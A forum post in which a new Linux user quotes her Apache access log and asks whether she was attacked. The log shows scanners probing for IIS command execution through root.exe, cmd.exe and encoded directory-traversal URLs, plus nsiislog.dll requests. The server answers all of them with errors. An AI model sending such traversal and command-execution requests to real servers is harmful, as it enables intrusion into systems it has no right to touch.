attacked? hacked? help.....!


 



I am very new to Linux but was poking around in my newly set up Fedora Core 1 system today and came upon the lines below in the Apache Access Log when I used the "System Logs" icon in the System Tools Menu.

Is the IP at the beginning of each line the IP that requested the file that is shown at the end of the line? with the date and time in the center? If this isn't what's shown in this file, what is this format? What does this file tell me? Am I paranoid, or was someone trying to access my machine (but ignorantly assuming it was a Windows machine)?


Quoted Apache Access Log:

24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET /scripts/nsiislog.dll" 404 331 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET /scripts/nsiislog.dll" 404 331 "-" "-"


----------------------------------------

Thanks,
Lisa



